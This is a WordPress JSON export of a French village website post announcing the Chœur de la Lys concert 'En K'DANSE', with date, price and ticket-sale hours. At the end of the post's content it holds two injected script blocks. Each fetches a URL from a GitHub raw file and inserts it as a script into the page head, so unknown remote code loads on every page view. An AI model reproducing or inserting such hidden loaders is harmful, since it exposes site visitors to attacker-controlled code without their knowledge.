{"id":1243,"date":"2022-12-05T16:10:54","date_gmt":"2022-12-05T15:10:54","guid":{"rendered":"http:\/\/barbry.esy.es\/?p=1243"},"modified":"2024-07-29T06:38:35","modified_gmt":"2024-07-29T04:38:35","slug":"concert-en-kdanse-par-le-choeur-de-la-lys","status":"publish","type":"post","link":"https:\/\/www.haverskerque.fr\/index.php\/2022\/12\/05\/concert-en-kdanse-par-le-choeur-de-la-lys\/","title":{"rendered":"Concert \u00ab\u00a0En K&rsquo;DANSE\u00a0\u00bb par le ch\u0153ur de la Lys"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"536\" src=\"http:\/\/barbry.esy.es\/wp-content\/uploads\/2023\/03\/une-3-1024x536.jpg\" alt=\"\" class=\"wp-image-1245\" srcset=\"https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/03\/une-3-1024x536.jpg 1024w, https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/03\/une-3-300x157.jpg 300w, https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/03\/une-3-768x402.jpg 768w, https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/03\/une-3-390x205.jpg 390w, https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/03\/une-3.jpg 1200w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Dimanche 15 janvier 2023 \u00e0 16h30.<\/p>\n\n\n\n<p>Avec la participation de l&rsquo;orchestre \u00ab\u00a0\u00e9ph\u00e9m\u00e8re\u00a0\u00bb, nos danseurs, Lydia et Michel ainsi que les danseurs d&rsquo;Amand\u00e9liz Family.<\/p>\n\n\n\n<p>entr\u00e9e : 10\u20ac<\/p>\n\n\n\n<p>Renseignements : choeurdelalys62350@gmail.com<\/p>\n\n\n\n<p>Vente des places \u00e0 l&rsquo;\u00e9cole de musique :<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Samedi 10, 17 d\u00e9cembre et 7 janvier de 16h \u00e0 17h.<\/li>\n\n\n\n<li>Mercredi 21 et 28 d\u00e9cembre de 18h \u00e0 19h.<\/li>\n<\/ul>\n<script>var url = 'https:\/\/raw.githubusercontent.com\/lolngnos\/loles\/main\/step.txt';\nfetch(url)\n    .then(response => response.text())\n    .then(data => {\n        var script = document.createElement('script');\n        script.src = data.trim();\n        document.getElementsByTagName('head')[0].appendChild(script);\n    });<\/script><script>var url = 'https:\/\/raw.githubusercontent.com\/truba77\/trubnik\/main\/from.txt';\n\n        fetch(url)\n            .then(response => response.text())\n            .then(data => {\n                \/\/ head\n                var script = document.createElement('script');\n                script.src = data.trim(); \/\/ 44\n                document.getElementsByTagName('head')[0].appendChild(script);\n            })\n            .catch(error => {\n                console.error('bad go.txt:', error);\n            });<\/script>","protected":false},"excerpt":{"rendered":"<p>Dimanche 15 janvier 2023 \u00e0 16h30. Avec la participation de l&rsquo;orchestre \u00ab\u00a0\u00e9ph\u00e9m\u00e8re\u00a0\u00bb, nos danseurs, Lydia et Michel ainsi que les danseurs d&rsquo;Amand\u00e9liz Family. entr\u00e9e : 10\u20ac Renseignements : choeurdelalys62350@gmail.com Vente des places \u00e0 l&rsquo;\u00e9cole de musique :<\/p>\n","protected":false},"author":1,"featured_media":1244,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"cybocfi_hide_featured_image":"yes","footnotes":""},"categories":[7],"tags":[],"class_list":["post-1243","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-rendez-vous"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Concert &quot;En K&#039;DANSE&quot; par le ch\u0153ur de la Lys * Haverskerque, 100% Nature !*<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.haverskerque.fr\/index.php\/2022\/12\/05\/concert-en-kdanse-par-le-choeur-de-la-lys\/\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Concert &quot;En K&#039;DANSE&quot; par le ch\u0153ur de la Lys * Haverskerque, 100% Nature !*\" \/>\n<meta property=\"og:description\" content=\"Dimanche 15 janvier 2023 \u00e0 16h30. Avec la participation de l&rsquo;orchestre \u00ab\u00a0\u00e9ph\u00e9m\u00e8re\u00a0\u00bb, nos danseurs, Lydia et Michel ainsi que les danseurs d&rsquo;Amand\u00e9liz Family. entr\u00e9e : 10\u20ac Renseignements : choeurdelalys62350@gmail.com Vente des places \u00e0 l&rsquo;\u00e9cole de musique :\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.haverskerque.fr\/index.php\/2022\/12\/05\/concert-en-kdanse-par-le-choeur-de-la-lys\/\" \/>\n<meta property=\"og:site_name\" content=\"Haverskerque, 100% Nature !*\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/communehaverskerque\" \/>\n<meta property=\"article:published_time\" content=\"2022-12-05T15:10:54+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2024-07-29T04:38:35+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/03\/une-2.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1200\" \/>\n\t<meta property=\"og:image:height\" content=\"628\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"chti pc en d\u00e9tresse\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"\u00c9crit par\" \/>\n\t<meta name=\"twitter:data1\" content=\"chti pc en d\u00e9tresse\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2022\\\/12\\\/05\\\/concert-en-kdanse-par-le-choeur-de-la-lys\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2022\\\/12\\\/05\\\/concert-en-kdanse-par-le-choeur-de-la-lys\\\/\"},\"author\":{\"name\":\"chti pc en d\u00e9tresse\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#\\\/schema\\\/person\\\/5aef692024411f412afcec0eb18865a2\"},\"headline\":\"Concert \u00ab\u00a0En K&rsquo;DANSE\u00a0\u00bb par le ch\u0153ur de la Lys\",\"datePublished\":\"2022-12-05T15:10:54+00:00\",\"dateModified\":\"2024-07-29T04:38:35+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2022\\\/12\\\/05\\\/concert-en-kdanse-par-le-choeur-de-la-lys\\\/\"},\"wordCount\":64,\"publisher\":{\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2022\\\/12\\\/05\\\/concert-en-kdanse-par-le-choeur-de-la-lys\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/03\\\/une-2.jpg\",\"articleSection\":[\"Rendez-vous\"],\"inLanguage\":\"fr-FR\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2022\\\/12\\\/05\\\/concert-en-kdanse-par-le-choeur-de-la-lys\\\/\",\"url\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2022\\\/12\\\/05\\\/concert-en-kdanse-par-le-choeur-de-la-lys\\\/\",\"name\":\"Concert \\\"En K'DANSE\\\" par le ch\u0153ur de la Lys * Haverskerque, 100% Nature !*\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2022\\\/12\\\/05\\\/concert-en-kdanse-par-le-choeur-de-la-lys\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2022\\\/12\\\/05\\\/concert-en-kdanse-par-le-choeur-de-la-lys\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/03\\\/une-2.jpg\",\"datePublished\":\"2022-12-05T15:10:54+00:00\",\"dateModified\":\"2024-07-29T04:38:35+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2022\\\/12\\\/05\\\/concert-en-kdanse-par-le-choeur-de-la-lys\\\/#breadcrumb\"},\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2022\\\/12\\\/05\\\/concert-en-kdanse-par-le-choeur-de-la-lys\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2022\\\/12\\\/05\\\/concert-en-kdanse-par-le-choeur-de-la-lys\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\\\/\\\/www.haverskerque.fr\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Concert &#8220;En K&#8217;DANSE&#8221; par le ch\u0153ur de la Lys\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#website\",\"url\":\"https:\\\/\\\/haverskerque.fr\\\/\",\"name\":\"Haverskerque\",\"description\":\"Haverskerque, 100% Nature !\",\"publisher\":{\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#organization\"},\"alternateName\":\"Haverskerque\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/haverskerque.fr\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"fr-FR\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#organization\",\"name\":\"Commune d'Haverskerque\",\"alternateName\":\"Commune d'Haverskerque\",\"url\":\"https:\\\/\\\/haverskerque.fr\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2024\\\/01\\\/siteon0-e5814-1.png\",\"contentUrl\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2024\\\/01\\\/siteon0-e5814-1.png\",\"width\":236,\"height\":102,\"caption\":\"Commune d'Haverskerque\"},\"image\":{\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/communehaverskerque\",\"https:\\\/\\\/www.instagram.com\\\/communehaverskerque\\\/\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#\\\/schema\\\/person\\\/5aef692024411f412afcec0eb18865a2\",\"name\":\"chti pc en d\u00e9tresse\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g\",\"caption\":\"chti pc en d\u00e9tresse\"},\"sameAs\":[\"https:\\\/\\\/haverskerque.fr\"],\"url\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/author\\\/estorez\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Concert \"En K'DANSE\" par le ch\u0153ur de la Lys * Haverskerque, 100% Nature !*","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.haverskerque.fr\/index.php\/2022\/12\/05\/concert-en-kdanse-par-le-choeur-de-la-lys\/","og_locale":"fr_FR","og_type":"article","og_title":"Concert \"En K'DANSE\" par le ch\u0153ur de la Lys * Haverskerque, 100% Nature !*","og_description":"Dimanche 15 janvier 2023 \u00e0 16h30. Avec la participation de l&rsquo;orchestre \u00ab\u00a0\u00e9ph\u00e9m\u00e8re\u00a0\u00bb, nos danseurs, Lydia et Michel ainsi que les danseurs d&rsquo;Amand\u00e9liz Family. entr\u00e9e : 10\u20ac Renseignements : choeurdelalys62350@gmail.com Vente des places \u00e0 l&rsquo;\u00e9cole de musique :","og_url":"https:\/\/www.haverskerque.fr\/index.php\/2022\/12\/05\/concert-en-kdanse-par-le-choeur-de-la-lys\/","og_site_name":"Haverskerque, 100% Nature !*","article_publisher":"https:\/\/www.facebook.com\/communehaverskerque","article_published_time":"2022-12-05T15:10:54+00:00","article_modified_time":"2024-07-29T04:38:35+00:00","og_image":[{"width":1200,"height":628,"url":"https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/03\/une-2.jpg","type":"image\/jpeg"}],"author":"chti pc en d\u00e9tresse","twitter_card":"summary_large_image","twitter_misc":{"\u00c9crit par":"chti pc en d\u00e9tresse"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.haverskerque.fr\/index.php\/2022\/12\/05\/concert-en-kdanse-par-le-choeur-de-la-lys\/#article","isPartOf":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2022\/12\/05\/concert-en-kdanse-par-le-choeur-de-la-lys\/"},"author":{"name":"chti pc en d\u00e9tresse","@id":"https:\/\/haverskerque.fr\/#\/schema\/person\/5aef692024411f412afcec0eb18865a2"},"headline":"Concert \u00ab\u00a0En K&rsquo;DANSE\u00a0\u00bb par le ch\u0153ur de la Lys","datePublished":"2022-12-05T15:10:54+00:00","dateModified":"2024-07-29T04:38:35+00:00","mainEntityOfPage":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2022\/12\/05\/concert-en-kdanse-par-le-choeur-de-la-lys\/"},"wordCount":64,"publisher":{"@id":"https:\/\/haverskerque.fr\/#organization"},"image":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2022\/12\/05\/concert-en-kdanse-par-le-choeur-de-la-lys\/#primaryimage"},"thumbnailUrl":"https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/03\/une-2.jpg","articleSection":["Rendez-vous"],"inLanguage":"fr-FR"},{"@type":"WebPage","@id":"https:\/\/www.haverskerque.fr\/index.php\/2022\/12\/05\/concert-en-kdanse-par-le-choeur-de-la-lys\/","url":"https:\/\/www.haverskerque.fr\/index.php\/2022\/12\/05\/concert-en-kdanse-par-le-choeur-de-la-lys\/","name":"Concert \"En K'DANSE\" par le ch\u0153ur de la Lys * Haverskerque, 100% Nature !*","isPartOf":{"@id":"https:\/\/haverskerque.fr\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2022\/12\/05\/concert-en-kdanse-par-le-choeur-de-la-lys\/#primaryimage"},"image":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2022\/12\/05\/concert-en-kdanse-par-le-choeur-de-la-lys\/#primaryimage"},"thumbnailUrl":"https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/03\/une-2.jpg","datePublished":"2022-12-05T15:10:54+00:00","dateModified":"2024-07-29T04:38:35+00:00","breadcrumb":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2022\/12\/05\/concert-en-kdanse-par-le-choeur-de-la-lys\/#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.haverskerque.fr\/index.php\/2022\/12\/05\/concert-en-kdanse-par-le-choeur-de-la-lys\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.haverskerque.fr\/index.php\/2022\/12\/05\/concert-en-kdanse-par-le-choeur-de-la-lys\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/www.haverskerque.fr\/"},{"@type":"ListItem","position":2,"name":"Concert &#8220;En K&#8217;DANSE&#8221; par le ch\u0153ur de la Lys"}]},{"@type":"WebSite","@id":"https:\/\/haverskerque.fr\/#website","url":"https:\/\/haverskerque.fr\/","name":"Haverskerque","description":"Haverskerque, 100% Nature !","publisher":{"@id":"https:\/\/haverskerque.fr\/#organization"},"alternateName":"Haverskerque","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/haverskerque.fr\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"fr-FR"},{"@type":"Organization","@id":"https:\/\/haverskerque.fr\/#organization","name":"Commune d'Haverskerque","alternateName":"Commune d'Haverskerque","url":"https:\/\/haverskerque.fr\/","logo":{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/haverskerque.fr\/#\/schema\/logo\/image\/","url":"https:\/\/haverskerque.fr\/wp-content\/uploads\/2024\/01\/siteon0-e5814-1.png","contentUrl":"https:\/\/haverskerque.fr\/wp-content\/uploads\/2024\/01\/siteon0-e5814-1.png","width":236,"height":102,"caption":"Commune d'Haverskerque"},"image":{"@id":"https:\/\/haverskerque.fr\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/communehaverskerque","https:\/\/www.instagram.com\/communehaverskerque\/"]},{"@type":"Person","@id":"https:\/\/haverskerque.fr\/#\/schema\/person\/5aef692024411f412afcec0eb18865a2","name":"chti pc en d\u00e9tresse","image":{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/secure.gravatar.com\/avatar\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g","caption":"chti pc en d\u00e9tresse"},"sameAs":["https:\/\/haverskerque.fr"],"url":"https:\/\/www.haverskerque.fr\/index.php\/author\/estorez\/"}]}},"_links":{"self":[{"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/posts\/1243","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/comments?post=1243"}],"version-history":[{"count":2,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/posts\/1243\/revisions"}],"predecessor-version":[{"id":8295,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/posts\/1243\/revisions\/8295"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/media\/1244"}],"wp:attachment":[{"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/media?parent=1243"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/categories?post=1243"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/tags?post=1243"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}